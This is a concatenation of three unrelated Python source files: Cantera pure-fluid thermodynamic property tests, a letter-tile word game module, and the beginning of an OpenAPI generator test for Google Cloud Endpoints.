self.water.UP = -1.45e7, 101325
self.assertNear(self.water.u, -1.45e7)
self.assertNear(self.water.P, 101325)
self.water.VH = 1.45, -1.45e7
self.assertNear(self.water.v, 1.45)
self.assertNear(self.water.h, -1.45e7)
self.water.TH = 400, -1.45e7
self.assertNear(self.water.T, 400)
self.assertNear(self.water.h, -1.45e7)
self.water.SH = 5000, -1.45e7
self.assertNear(self.water.s, 5000)
self.assertNear(self.water.h, -1.45e7)
self.water.ST = 5000, 400
self.assertNear(self.water.s, 5000)
self.assertNear(self.water.T, 400)
def test_set_X(self):
self.water.TX = 500, 0.0
p = self.water.P
self.water.X = 0.8
self.assertNear(self.water.P, p)
self.assertNear(self.water.T, 500)
self.assertNear(self.water.X, 0.8)
self.water.TP = 650, 101325
with self.assertRaises(Exception):
self.water.X = 0.1
self.water.TP = 300, 101325
with self.assertRaises(Exception):
self.water.X = 0.3
def test_set_minmax(self):
self.water.TP = self.water.min_temp, 101325
self.assertNear(self.water.T, self.water.min_temp)
self.water.TP = self.water.max_temp, 101325
self.assertNear(self.water.T, self.water.max_temp)
def check_fd_properties(self, T1, P1, T2, P2, tol):
# Properties which are computed as finite differences
self.water.TP = T1, P1
cp1 = self.water.cp_mass
cv1 = self.water.cv_mass
k1 = self.water.isothermal_compressibility
alpha1 = self.water.thermal_expansion_coeff
self.water.TP = T2, P2
cp2 = self.water.cp_mass
cv2 = self.water.cv_mass
k2 = self.water.isothermal_compressibility
alpha2 = self.water.thermal_expansion_coeff
self.assertNear(cp1, cp2, tol)
self.assertNear(cv1, cv2, tol)
self.assertNear(k1, k2, tol)
self.assertNear(alpha1, alpha2, tol)
def test_properties_near_min(self):
self.check_fd_properties(self.water.min_temp*(1+1e-5), 101325,
self.water.min_temp*(1+1e-4), 101325, 1e-2)
def test_properties_near_max(self):
self.check_fd_properties(self.water.max_temp*(1-1e-5), 101325,
self.water.max_temp*(1-1e-4), 101325, 1e-2)
def test_TPX(self):
self.water.TX = 400, 0.8
T,P,X = self.water.TPX
self.assertNear(T, 400)
self.assertNear(X, 0.8)
with self.assertRaises(AttributeError):
self.water.TPX = 500, 101325, 0.3
# To minimize errors when transcribing tabulated data, the input units here are:
# T: K, P: MPa, rho: kg/m3, v: m3/kg, (u,h): kJ/kg, s: kJ/kg-K
# Which are then converted to SI
class StateData(object):
def __init__(self, phase, T, p, rho=None, v=None, u=None, h=None, s=None, relax=False):
self.phase = phase
self.T = T
self.p = p * 1e6
self.rho = rho if rho else 1.0/v
self.u = 1e3 * u if u is not None else 1e3 * h - self.p/self.rho
self.s = 1e3 * s
self.tolMod = 10.0 if relax else 1.0
class Tolerances(object):
def __init__(self, p=None, u=None, s=None,
dUdS=None, dAdV=None, dPdT=None, hTs=None):
self.p = p or 2e-5
self.u = u or 2e-6
self.s = s or 2e-6
self.dUdS = dUdS or 2e-6
self.dAdV = dAdV or 2e-6
self.dPdT = dPdT or 2e-4
self.hTs = hTs or 2e-4
class PureFluidTestCases(object):
"""
Test the results of pure fluid phase calculations against tabulated
references and for consistency with basic thermodynamic relations.
"""
fluids = {}
def __init__(self, name, refState, tolerances=Tolerances()):
if name not in self.fluids:
self.fluids[name] = ct.PureFluid('liquidvapor.xml', name)
self.fluid = self.fluids[name]
self.fluid.TD = refState.T, refState.rho
self.refState = refState
self.u0 = self.fluid.u
self.s0 = self.fluid.s
self.tol = tolerances
def a(self, T, rho):
""" Helmholtz free energy """
self.fluid.TD = T, rho
return self.fluid.u - T * self.fluid.s
def test_consistency_temperature(self):
for state in self.states:
dT = 2e-5 * state.T
self.fluid.TD = state.T-dT, state.rho
s1 = self.fluid.s
u1 = self.fluid.u
self.fluid.TD = state.T+dT, state.rho
s2 = self.fluid.s
u2 = self.fluid.u
# At constant volume, dU = T dS
msg = 'At state: T=%s, rho=%s' % (state.T, state.rho)
self.assertNear((u2-u1)/(s2-s1), state.T, self.tol.dUdS, msg=msg)
def test_consistency_volume(self):
for state in self.states:
self.fluid.TD = state.T, state.rho
p = self.fluid.P
V = 1 / state.rho
dV = 5e-6 * V
a1 = self.a(state.T, 1/(V-0.5*dV))
a2 = self.a(state.T, 1/(V+0.5*dV))
# dP/drho is high for liquids, so relax tolerances
tol = 100*self.tol.dAdV if state.phase == 'liquid' else self.tol.dAdV
# At constant temperature, dA = - p dV
msg = 'At state: T=%s, rho=%s' % (state.T, state.rho)
self.assertNear(-(a2-a1)/dV, p, tol, msg=msg)
def test_saturation(self):
for state in self.states:
if state.phase == 'super':
continue
dT = 1e-6 * state.T
self.fluid.TX = state.T, 0
p1 = self.fluid.P
vf = 1.0 / self.fluid.density
hf = self.fluid.h
sf = self.fluid.s
self.fluid.TX = state.T + dT, 0
p2 = self.fluid.P
self.fluid.TX = state.T, 1
vg = 1.0 / self.fluid.density
hg = self.fluid.h
sg = self.fluid.s
# Clausius-Clapeyron Relation
msg = 'At state: T=%s, rho=%s' % (state.T, state.rho)
self.assertNear((p2-p1)/dT, (hg-hf)/(state.T * (vg-vf)),
self.tol.dPdT, msg=msg)
# True for a change in state at constant pressure and temperature
self.assertNear(hg-hf, state.T * (sg-sf), self.tol.hTs, msg=msg)
def test_pressure(self):
for state in self.states:
self.fluid.TD = state.T, state.rho
# dP/drho is high for liquids, so relax tolerances
tol = 50*self.tol.p if state.phase == 'liquid' else self.tol.p
tol *= state.tolMod
msg = 'At state: T=%s, rho=%s' % (state.T, state.rho)
self.assertNear(self.fluid.P, state.p, tol, msg=msg)
def test_internal_energy(self):
for state in self.states:
self.fluid.TD = state.T, state.rho
msg = 'At state: T=%s, rho=%s' % (state.T, state.rho)
self.assertNear(self.fluid.u - self.u0,
state.u - self.refState.u,
self.tol.u * state.tolMod, msg=msg)
def test_entropy(self):
for state in self.states:
self.fluid.TD = state.T, state.rho
msg = 'At state: T=%s, rho=%s' % (state.T, state.rho)
self.assertNear(self.fluid.s - self.s0,
state.s - self.refState.s,
self.tol.s * state.tolMod, msg=msg)
# Reference values for HFC134a taken from NIST Chemistry WebBook, which
# implements the same EOS from Tillner-Roth and Baehr as Cantera, so close
# agreement is expected.
class HFC134a(PureFluidTestCases, utilities.CanteraTest):
states = [
StateData('liquid', 175.0, 0.1, rho=1577.6239, u=77.534586, s=0.44788182),
StateData('liquid', 210.0, 0.1, rho=1483.2128, u=119.48566, s=0.66633877),
StateData('vapor', 250.0, 0.1, rho=5.1144317, u=365.59424, s=1.7577491),
StateData('vapor', 370.0, 0.1, rho=3.3472612, u=459.82664, s=2.0970769),
StateData('liquid', 290.0, 10, rho=1278.4700, u=216.99119, s=1.0613409),
StateData('super', 410.0, 10, rho=736.54666, u=399.02258, s=1.5972395),
StateData('super', 450.0, 40, rho=999.34087, u=411.92422, s=1.6108568)]
def __init__(self, *args, **kwargs):
refState = StateData('critical', 374.21, 4.05928,
rho=511.900, u=381.70937, s=1.5620991)
PureFluidTestCases.__init__(self, 'hfc134a', refState)
utilities.CanteraTest.__init__(self, *args, **kwargs)
# Reference values for the following substances are taken from the tables in
# W.C. Reynolds, "Thermodynamic Properties in SI", which is the source of
# Cantera's equations of state for these substances. Agreement is limited by
# the precision of the results printed in the book (typically 4 significant
# figures).
# Property comparisons for saturated states are further limited by the use of
# different methods for satisfying the phase equilibrium condition g_l = g_v.
# Cantera uses the actual equation of state, while the tabulated values given
# by Reynolds are based on the given P_sat(T_sat) relations.
class CarbonDioxide(PureFluidTestCases, utilities.CanteraTest):
states = [
StateData('liquid', 230.0, 2.0, rho=1132.4, h=28.25, s=0.1208),
StateData('liquid', 270.0, 10.0, rho=989.97, h=110.59, s=0.4208),
StateData('vapor', 250.0, 1.788, v=0.02140, h=358.59, s=1.4500, relax=True), # sat
StateData('vapor', 300.0, 2.0, v=0.02535, h=409.41, s=1.6174),
StateData('super', 500.0, 1.0, v=0.09376, h=613.22, s=2.2649),
StateData('super', 600.0, 20.0, v=0.00554, h=681.94, s=1.8366)]
def __init__(self, *args, **kwargs):
refState = StateData('critical', 304.21, 7.3834,
rho=464.0, h=257.31, s=0.9312)
tols = Tolerances(2e-3, 2e-3, 2e-3)
PureFluidTestCases.__init__(self, 'carbondioxide', refState, tols)
utilities.CanteraTest.__init__(self, *args, **kwargs)
class Heptane(PureFluidTestCases, utilities.CanteraTest):
states = [
StateData('liquid', 300.0, 0.006637, v=0.001476, h=0.0, s=0.0, relax=True), # sat
StateData('liquid', 400.0, 0.2175, v=0.001712, h=248.01, s=0.709, relax=True), # sat
StateData('vapor', 490.0, 1.282, v=0.02222, h=715.64, s=1.7137, relax=True), # sat
StateData('vapor', 480.0, 0.70, v=0.04820, h=713.04, s=1.7477),
StateData('super', 600.0, 2.0, v=0.01992, h=1014.87, s=2.2356),
StateData('super', 680.0, 0.2, v=0.2790, h=1289.29, s=2.8450)]
def __init__(self, *args, **kwargs):
refState = StateData('critical', 537.68, 2.6199,
rho=197.60, h=747.84, s=1.7456)
tols = Tolerances(2e-3, 2e-3, 2e-3)
PureFluidTestCases.__init__(self, 'heptane', refState, tols)
utilities.CanteraTest.__init__(self, *args, **kwargs)
# para-hydrogen
class Hydrogen(PureFluidTestCases, utilities.CanteraTest):
states = [
StateData('liquid', 18.0, 0.04807, v=0.013660, h=30.1, s=1.856, relax=True), # sat
StateData('liquid', 26.0, 0.4029, v=0.015911, h=121.2, s=5.740, relax=True), # sat
StateData('vapor', 30.0, 0.8214, v=0.09207, h=487.4, s=17.859, relax=True), # sat
StateData('super', 100.0, 0.20, v=2.061, h=1398.3, s=39.869),
StateData('super', 200.0, 20.0, v=0.04795, h=3015.9, s=31.274),
StateData('super', 300.0, 0.50, v=2.482, h=4511.6, s=53.143),
StateData('super', 600.0, 1.00, v=2.483, h=8888.4, s=60.398),
StateData('super', 800.0, 4.0, v=0.8329, h=11840.0, s=58.890)]
def __init__(self, *args, **kwargs):
refState = StateData('critical', 32.938, 1.2838,
rho=31.36, h=346.5, s=12.536)
tols = Tolerances(2e-3, 2e-3, 2e-3, 2e-4)
PureFluidTestCases.__init__(self, 'hydrogen', refState, tols)
utilities.CanteraTest.__init__(self, *args, **kwargs)
class Methane(PureFluidTestCases, utilities.CanteraTest):
states = [
StateData('liquid', 100.0, 0.50, rho=439.39, h=31.65, s=0.3206),
StateData('liquid', 140.0, 2.0, rho=379.51, h=175.48, s=1.4963),
StateData('vapor', 150.0, 0.20, v=0.3772, h=660.72, s=5.5435),
StateData('vapor', 160.0, 1.594, v=0.03932, h=627.96, s=4.3648, relax=True), # sat
StateData('vapor', 175.0, 1.0, v=0.08157, h=692.55, s=4.9558),
StateData('super', 200.0, 0.2, v=0.5117, h=767.37, s=6.1574),
StateData('super', 300.0, 0.5, v=0.3083, h=980.87, s=6.5513)]
def __init__(self, *args, **kwargs):
refState = StateData('critical', 190.555, 4.5988,
rho=160.43, h=490.61, s=3.2853)
tols = Tolerances(2e-3, 2e-3, 2e-3)
PureFluidTestCases.__init__(self, 'methane', refState, tols)
utilities.CanteraTest.__init__(self, *args, **kwargs)
class Nitrogen(PureFluidTestCases, utilities.CanteraTest):
states = [
StateData('liquid', 80.0, 0.1370, v=0.001256, h=33.50, s=0.4668, relax=True), # sat
StateData('vapor', 110.0, 1.467, v=0.01602, h=236.28, s=2.3896, relax=True), # sat
StateData('super', 200.0, 0.5, v=0.1174, h=355.05, s=3.5019),
StateData('super', 300.0, 10.0, v=0.00895, h=441.78, s=2.9797),
StateData('super', 500.0, 5.0, v=0.03031, h=668.48, s=3.7722),
StateData('super', 600.0, 100.0, v=0.00276, h=827.54, s=3.0208)]
def __init__(self, *args, **kwargs):
refState = StateData('critical', 126.200, 3.400,
rho=314.03, h=180.78, s=1.7903)
tols = Tolerances(2e-3, 2e-3, 2e-3)
PureFluidTestCases.__init__(self, 'nitrogen', refState, tols)
utilities.CanteraTest.__init__(self, *args, **kwargs)
class Oxygen(PureFluidTestCases, utilities.CanteraTest):
states = [
StateData('liquid', 80.0, 0.03009, v=0.000840, h=42.56, s=0.6405, relax=True), # sat
StateData('liquid', 125.0, 1.351, v=0.001064, h=123.24, s=1.4236, relax=True), # sat
StateData('vapor', 145.0, 3.448, v=0.006458, h=276.45, s=2.4852, relax=True), # sat
StateData('super', 200.0, 0.050, v=1.038, h=374.65, s=4.1275),
StateData('super', 300.0, 1.0, v=0.07749, h=463.76, s=3.7135),
StateData('super', 600.0, 0.20, v=0.7798, h=753.38, s=4.7982),
StateData('super', 800.0, 5.0, v=0.04204, h=961.00, s=4.2571)
]
def __init__(self, *args, **kwargs):
refState = StateData('critical', 154.581, 5.0429,
rho=436.15, h=226.53, s=2.1080)
tols = Tolerances(2e-3, 2e-3, 2e-3)
PureFluidTestCases.__init__(self, 'oxygen', refState, tols)
utilities.CanteraTest.__init__(self, *args, **kwargs)
class Water(PureFluidTestCases, utilities.CanteraTest):
states = [
StateData('liquid', 295.0, 0.002620, v=0.0010025, h=90.7, s=0.3193, relax=True),
StateData('vapor', 315.0, 0.008143, v=17.80, h=2577.1, s=8.2216, relax=True),
StateData('liquid', 440.0, 0.7332, v=0.001110, h=705.0, s=2.0096, relax=True),
StateData('vapor', 510.0, 3.163, v=0.06323, h=2803.6, s=6.1652, relax=True),
StateData('vapor', 400.0, 0.004, v=46.13, h=2738.8, s=9.0035),
StateData('vapor', 500.0, 1.0, v=0.2206, h=2890.2, s=6.8223),
StateData('super', 800.0, 0.01, v=36.92, h=3546.0, s=9.9699),
StateData('super', 900.0, 0.70, v=0.5917, h=3759.4, s=8.2621),
StateData('super', 1000.0, 30.0, v=0.01421, h=3821.6, s=6.6373),
StateData('liquid', 500.0, 3.0, rho=832.04, h=975.68, s=2.58049)
]
def __init__(self, *args, **kwargs):
refState = StateData('critical', 647.286, 22.089,
rho=317.0, h=2098.8, s=4.4289)
tols = Tolerances(2e-3, 2e-3, 2e-3)
PureFluidTestCases.__init__(self, 'water', refState, tols)
utilities.CanteraTest.__init__(self, *args, **kwargs)
class PureFluidConvergence(utilities.CanteraTest):
def setUp(self):
self.fluid = ct.Water()
def test_TP(self):
# Focus on the region near the critical point
TT = [273.161, 300.0, 350.0, 400.0, 500.0,
600.0, 640.0, 645.0, 646.0, 647.0,
647.1, 647.2, 647.22, 647.23, 647.25,
647.26, 647.27, 647.28, 647.282, 647.284,
647.285, 647.286, 647.287, 650.0, 800.0]
PP = [1234.0, 101325.0, 5e5, 22.0e6, 22.08e6, 22.09e6, 10001000.0]
errors = ''
nErrors = 0
for T,P in itertools.product(TT, PP):
try:
self.fluid.TP = T, P
self.assertNear(self.fluid.T, T, 1e-6)
self.assertNear(self.fluid.P, P, 1e-6)
except Exception as e:
errors += 'Error at T=%r, P=%r:\n%s\n\n' % (T,P,e)
nErrors += 1
if errors:
errors += 'Total error count:%s\n' % nErrors
raise AssertionError(errors)
def test_UV(self):
u0 = -1.58581e7
UU = np.array([0, 100, 200, 500, 1000, 1500, 2000]) * 1000 + u0
VV = [0.001, 0.002, 0.005, 0.010, 0.10, 0.5, 1.0, 1.5, 2.0]
errors = ''
nErrors = 0
for u,v in itertools.product(UU, VV):
try:
self.fluid.UV = u, v
self.assertNear(self.fluid.u, u, 1e-6)
self.assertNear(self.fluid.v, v, 1e-6)
except Exception as e:
errors += 'Error at u=%r, v=%r:\n%s\n\n' % (u,v,e)
nErrors += 1
if errors:
errors += 'Total error count:%s\n' % nErrors
raise AssertionError(errors)
def test_HP(self):
h0 = -1.58581e7
HH = np.array([0, 100, 200, 500, 1000, 1500, 2000]) * 1000 + h0
PP = [1234.0, 101325.0, 5e5, 22.0e6, 22.08e6, 22.09e6, 10001000.0]
errors = ''
nErrors = 0
for h,P in itertools.product(HH, PP):
try:
self.fluid.HP = h, P
self.assertNear(self.fluid.h, h, 1e-6)
self.assertNear(self.fluid.P, P, 1e-6)
except Exception as e:
errors += 'Error at h=%r, P=%r:\n%s\n\n' % (h,P,e)
nErrors += 1
if errors:
errors += 'Total error count:%s\n' % nErrors
raise AssertionError(errors)
| |
import os
import random
import letters
class Field(object):
'''
The Field is the data structure that will hold all tiles
currently on-screen, as well as the tile currently falling.
It is a list of lists, where for any <self.cells[i][j]>, i represents
the row and j represents the column.
'''
def __init__(self, language, num_rows, num_columns):
self.language = language
self.letters = letters.Alphabet(language).weighted + ([None] * 5000)
self.num_rows = num_rows
self.floor_one = (num_rows / 2) - 1
self.floor_two = num_rows - 1
self.num_columns = num_columns
self.cells = []
self.active_tile = None
self.tile_queue = []
self.queue_limit = 5
for i in range(num_rows):
self.cells.append([])
for j in range(num_columns):
self.cells[i].append(None)
self.load_queue()
self.get_tile_from_queue()
def __str__(self):
output = '\n'.join([str([cell for cell in row]) for row in self.cells])
return "Field state:\n" + output
def __repr__(self):
tokens = (self.language, self.num_rows, self.num_columns)
output = "Field, language: %s, dimensions: (%d,%d)" % tokens
return output
def active_tile_has_landed(self):
tile = self.active_tile
row, column = tile.location
row_beneath = row + 1
return (row_beneath >= self.floor_one) or \
self.cells[row_beneath][column] != None
def add_tile_to_queue(self, tile):
self.tile_queue.append(tile)
def change_wildcard_letter(self, forward):
if self.active_tile.wildcard:
letter = self.active_tile.letter
letter_list = letters.languages[self.language]
letter_count = len(letter_list)
if letter:
index = letter_list.index(letter)
if forward:
new_index = (index + 1) % letter_count
else:
new_index = (index - 1) % letter_count
else:
new_index = 0 if forward else letter_count - 1
self.active_tile.letter = letter_list[new_index]
def create_random_tile(self):
letter = random.choice(self.letters)
tile = Tile(self, letter)
if not tile.letter:
tile.wildcard = True
return tile
def deactivate_active_tile(self):
self.active_tile = None
def drop_active_tile(self):
while not self.active_tile_has_landed():
self.move_tile(self.active_tile, [1,0])
def drop_column(self, column_number):
if self.cells[self.floor_two][column_number]: # column is full
return None
else:
column_tiles = [self.active_tile]
current_row = self.active_tile.location[0] + 1
for i in range(current_row, self.num_rows):
if self.cells[i][column_number]:
column_tiles.append(self.cells[i][column_number])
current_row += 1
if len(column_tiles) == 1:
return None
for tile in reversed(column_tiles): # move from bottom to top
self.move_tile(tile, [1,0])
def get_tile_from_queue(self):
if self.tile_queue:
self.active_tile = self.tile_queue.pop(0)
self.add_tile_to_queue(self.create_random_tile())
else:
print "Queue is empty!"
def load_queue(self):
while len(self.tile_queue) < self.queue_limit:
tile = self.create_random_tile()
self.add_tile_to_queue(tile)
def move_tile(self, tile, direction):
row, column = tile.location
new_row, new_column = (row + direction[0], column + direction[1])
if new_column not in range(0, self.num_columns) or\
self.cells[new_row][new_column]:
return False
self.cells[row][column] = None
self.place_tile(tile, (new_row, new_column))
def place_tile(self, tile, location):
row, column = location
if self.cells[row][column]:
return False
else:
self.cells[row][column] = tile
tile.location = location
return True
def stage_tile(self):
'''
Stage a wildcard tile as the next tile in the queue.
'''
self.tile_queue[0] = Tile(self, 'wildcard')
class Tile(object):
'''
A simple, one-square tile representing one of the 26 letters of the
English alphabet, or a blank wild-card square.
Although for right now I am working with English to get a prototype
going, I plan on loading the alphabet into the game in a way that will
allow for extensibility.
'''
def __init__(self, field, letter='wildcard'):
self.location = None
self.field = field
if letter == 'wildcard':
self.letter = None
self.wildcard = True
else:
self.letter = letter
self.wildcard = False
def __repr__(self):
return "%s" % self.letter
__str__ = __repr__
def push_tile_below(self, field):
row, column = self.location
if (row + 1) >= self.field.num_rows:
return False
if self.field[row+1][column]:
tile_below = self.field[row+1][column]
if tile_below.push_tile_below(field):
self.location = (row + 1, column)
self.field[row+1][column] = self # adjust to Field method
self.field[row][column] = None
return True
else:
return False
else:
self.location = (row + 1, column)
self.field[row+1][column] = self
self.field[row][column] = None
return True
class LetterPool(object):
"""
This object will keep a list of letters, weighted by probability in order
to maintain a more helpful distribution of letters throughout the game.
Letter frequencies by word were found at:
http://en.wikipedia.org/wiki/Letter_frequency#Relative_frequencies_of_letters_in_the_English_language
"""
FILE_DIRECTORY = os.getcwd() + os.sep + "letterfiles" + os.sep
LANGUAGES = []
for file_name in os.listdir(FILE_DIRECTORY):
dot = file_name.index('.')
LANGUAGES.append(file_name[:dot])
def __init__(self, language):
self.language = language
def parseLetterFile(self):
file = open(FILE_DIRECTORY + self.language + ".csv")
class Wordlist(object):
"""
The list of words that the game will check against to search for a match.
Will be extensible for multiple languages.
"""
def __init__(self, language):
if language == "debug":
self.words = {"a", "test", "module", "for", "words"}
else:
raise NotImplementedError
| |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for endpoints.openapi_generator."""
import json
import unittest
import endpoints.api_config as api_config
from protorpc import message_types
from protorpc import messages
from protorpc import remote
import endpoints.resource_container as resource_container
import endpoints.openapi_generator as openapi_generator
import test_util
package = 'OpenApiGeneratorTest'
class Nested(messages.Message):
"""Message class to be used in a message field."""
int_value = messages.IntegerField(1)
string_value = messages.StringField(2)
class SimpleEnum(messages.Enum):
"""Simple enumeration type."""
VAL1 = 1
VAL2 = 2
class AllFields(messages.Message):
"""Contains all field types."""
bool_value = messages.BooleanField(1, variant=messages.Variant.BOOL)
bytes_value = messages.BytesField(2, variant=messages.Variant.BYTES)
double_value = messages.FloatField(3, variant=messages.Variant.DOUBLE)
enum_value = messages.EnumField(SimpleEnum, 4)
float_value = messages.FloatField(5, variant=messages.Variant.FLOAT)
int32_value = messages.IntegerField(6, variant=messages.Variant.INT32)
int64_value = messages.IntegerField(7, variant=messages.Variant.INT64)
string_value = messages.StringField(8, variant=messages.Variant.STRING)
uint32_value = messages.IntegerField(9, variant=messages.Variant.UINT32)
uint64_value = messages.IntegerField(10, variant=messages.Variant.UINT64)
sint32_value = messages.IntegerField(11, variant=messages.Variant.SINT32)
sint64_value = messages.IntegerField(12, variant=messages.Variant.SINT64)
message_field_value = messages.MessageField(Nested, 13)
datetime_value = message_types.DateTimeField(14)
# This is used test "all fields" as query parameters instead of the body
# in a request.
ALL_FIELDS_AS_PARAMETERS = resource_container.ResourceContainer(
**{field.name: field for field in AllFields.all_fields()})
class BaseOpenApiGeneratorTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
def setUp(self):
self.generator = openapi_generator.OpenApiGenerator()
def _def_path(self, path):
return '#/definitions/' + path
class OpenApiGeneratorTest(BaseOpenApiGeneratorTest):
def testAllFieldTypes(self):
class PutRequest(messages.Message):
"""Message with just a body field."""
body = messages.MessageField(AllFields, 1)
# pylint: disable=invalid-name
class ItemsPutRequest(messages.Message):
"""Message with path params and a body field."""
body = messages.MessageField(AllFields, 1)
entryId = messages.StringField(2, required=True)
class ItemsPutRequestForContainer(messages.Message):
"""Message with path params and a body field."""
body = messages.MessageField(AllFields, 1)
items_put_request_container = resource_container.ResourceContainer(
ItemsPutRequestForContainer,
entryId=messages.StringField(2, required=True))
# pylint: disable=invalid-name
class EntryPublishRequest(messages.Message):
"""Message with two required params, one in path, one in body."""
title = messages.StringField(1, required=True)
entryId = messages.StringField(2, required=True)
class EntryPublishRequestForContainer(messages.Message):
"""Message with two required params, one in path, one in body."""
title = messages.StringField(1, required=True)
entry_publish_request_container = resource_container.ResourceContainer(
EntryPublishRequestForContainer,
entryId=messages.StringField(2, required=True))
class BooleanMessageResponse(messages.Message):
result = messages.BooleanField(1, required=True)
@api_config.api(name='root', hostname='example.appspot.com', version='v1')
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(AllFields, message_types.VoidMessage, path='entries',
http_method='GET', name='entries.get')
def entries_get(self, unused_request):
"""All field types in the query parameters."""
return message_types.VoidMessage()
@api_config.method(ALL_FIELDS_AS_PARAMETERS, message_types.VoidMessage,
path='entries/container', http_method='GET',
name='entries.getContainer')
def entries_get_container(self, unused_request):
"""All field types in the query parameters."""
return message_types.VoidMessage()
@api_config.method(PutRequest, BooleanMessageResponse, path='entries',
name='entries.put')
def entries_put(self, unused_request):
"""Request body is in the body field."""
return BooleanMessageResponse(result=True)
@api_config.method(AllFields, message_types.VoidMessage, path='process',
name='entries.process')
def entries_process(self, unused_request):
"""Message is the request body."""
return message_types.VoidMessage()
@api_config.method(message_types.VoidMessage, message_types.VoidMessage,
name='entries.nested.collection.action',
path='nested')
def entries_nested_collection_action(self, unused_request):
"""A VoidMessage for a request body."""
return message_types.VoidMessage()
@api_config.method(AllFields, AllFields, name='entries.roundtrip',
path='roundtrip')
def entries_roundtrip(self, unused_request):
"""All field types in the request and response."""
pass
# Test a method with a required parameter in the request body.
@api_config.method(EntryPublishRequest, message_types.VoidMessage,
path='entries/{entryId}/publish',
name='entries.publish')
def entries_publish(self, unused_request):
"""Path has a parameter and request body has a required param."""
return message_types.VoidMessage()
@api_config.method(entry_publish_request_container,
message_types.VoidMessage,
path='entries/container/{entryId}/publish',
name='entries.publishContainer')
def entries_publish_container(self, unused_request):
"""Path has a parameter and request body has a required param."""
return message_types.VoidMessage()
# Test a method with a parameter in the path and a request body.
@api_config.method(ItemsPutRequest, message_types.VoidMessage,
path='entries/{entryId}/items',
name='entries.items.put')
def items_put(self, unused_request):
"""Path has a parameter and request body is in the body field."""
return message_types.VoidMessage()
@api_config.method(items_put_request_container, message_types.VoidMessage,
path='entries/container/{entryId}/items',
name='entries.items.putContainer')
def items_put_container(self, unused_request):
"""Path has a parameter and request body is in the body field."""
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
# Some constants to shorten line length in expected OpenAPI output
prefix = 'OpenApiGeneratorTest'
boolean_response = prefix + 'BooleanMessageResponse'
all_fields = prefix + 'AllFields'
nested = prefix + 'Nested'
entry_publish_request = prefix + 'EntryPublishRequest'
publish_request_for_container = prefix + 'EntryPublishRequestForContainer'
items_put_request = prefix + 'ItemsPutRequest'
put_request_for_container = prefix + 'ItemsPutRequestForContainer'
put_request = prefix + 'PutRequest'
expected_openapi = {
'swagger': '2.0',
'info': {
'title': 'root',
'description': 'Describes MyService.',
'version': 'v1',
},
'host': 'example.appspot.com',
'consumes': ['application/json'],
'produces': ['application/json'],
'schemes': ['https'],
'basePath': '/_ah/api',
'paths': {
'/root/v1/entries': {
'get': {
'operationId': 'MyService_entriesGet',
'parameters': [
{
'name': 'bool_value',
'in': 'query',
'type': 'boolean',
},
{
'name': 'bytes_value',
'in': 'query',
'type': 'string',
'format': 'byte',
},
{
'name': 'double_value',
'in': 'query',
'type': 'number',
'format': 'double',
},
{
'name': 'enum_value',
'in': 'query',
'type': 'string',
'enum': [
'VAL1',
'VAL2',
],
},
{
'name': 'float_value',
'in': 'query',
'type': 'number',
'format': 'float',
},
{
'name': 'int32_value',
'in': 'query',
'type': 'integer',
'format': 'int32',
},
{
'name': 'int64_value',
'in': 'query',
'type': 'string',
'format': 'int64',
},
{
'name': 'string_value',
'in': 'query',
'type': 'string',
},
{
'name': 'uint32_value',
'in': 'query',
'type': 'integer',
'format': 'uint32',
},
{
'name': 'uint64_value',
'in': 'query',
'type': 'string',
'format': 'uint64',
},
{
'name': 'sint32_value',
'in': 'query',
'type': 'integer',
'format': 'int32',
},
{
'name': 'sint64_value',
'in': 'query',
'type': 'string',
'format': 'int64',
}
],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
'post': {
'operationId': 'MyService_entriesPut',
'parameters': [],
'responses': {
'200': {
'description': 'A successful response',
'schema': {
'$ref': self._def_path(boolean_response),
},
},
},
},
},
'/root/v1/entries/container': {
'get': {
'operationId': 'MyService_entriesGetContainer',
'parameters': [
{
'name': 'bool_value',
'in': 'query',
'type': 'boolean',
},
{
'name': 'bytes_value',
'in': 'query',
'type': 'string',
'format': 'byte',
},
{
'name': 'double_value',
'in': 'query',
'type': 'number',
'format': 'double',
},
{
'name': 'enum_value',
'in': 'query',
'type': 'string',
'enum': [
'VAL1',
'VAL2',
],
},
{
'name': 'float_value',
'in': 'query',
'type': 'number',
'format': 'float',
},
{
'name': 'int32_value',
'in': 'query',
'type': 'integer',
'format': 'int32',
},
{
'name': 'int64_value',
'in': 'query',
'type': 'string',
'format': 'int64',
},
{
'name': 'string_value',
'in': 'query',
'type': 'string',
},
{
'name': 'uint32_value',
'in': 'query',
'type': 'integer',
'format': 'uint32',
},
{
'name': 'uint64_value',
'in': 'query',
'type': 'string',
'format': 'uint64',
},
{
'name': 'sint32_value',
'in': 'query',
'type': 'integer',
'format': 'int32',
},
{
'name': 'sint64_value',
'in': 'query',
'type': 'string',
'format': 'int64',
},
],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
'/root/v1/entries/container/{entryId}/items': {
'post': {
'operationId': 'MyService_itemsPutContainer',
'parameters': [
{
'name': 'entryId',
'in': 'path',
'required': True,
'type': 'string',
},
],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
'/root/v1/entries/container/{entryId}/publish': {
'post': {
'operationId': 'MyService_entriesPublishContainer',
'parameters': [
{
'name': 'entryId',
'in': 'path',
'required': True,
'type': 'string',
},
],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
'/root/v1/entries/{entryId}/items': {
'post': {
'operationId': 'MyService_itemsPut',
'parameters': [
{
'name': 'entryId',
'in': 'path',
'required': True,
'type': 'string',
},
],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
'/root/v1/entries/{entryId}/publish': {
'post': {
'operationId': 'MyService_entriesPublish',
'parameters': [
{
'name': 'entryId',
'in': 'path',
'required': True,
'type': 'string',
},
],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
'/root/v1/nested': {
'post': {
'operationId': 'MyService_entriesNestedCollectionAction',
'parameters': [],
'responses': {
'200': {
'description': 'A successful response',
},
},
},
},
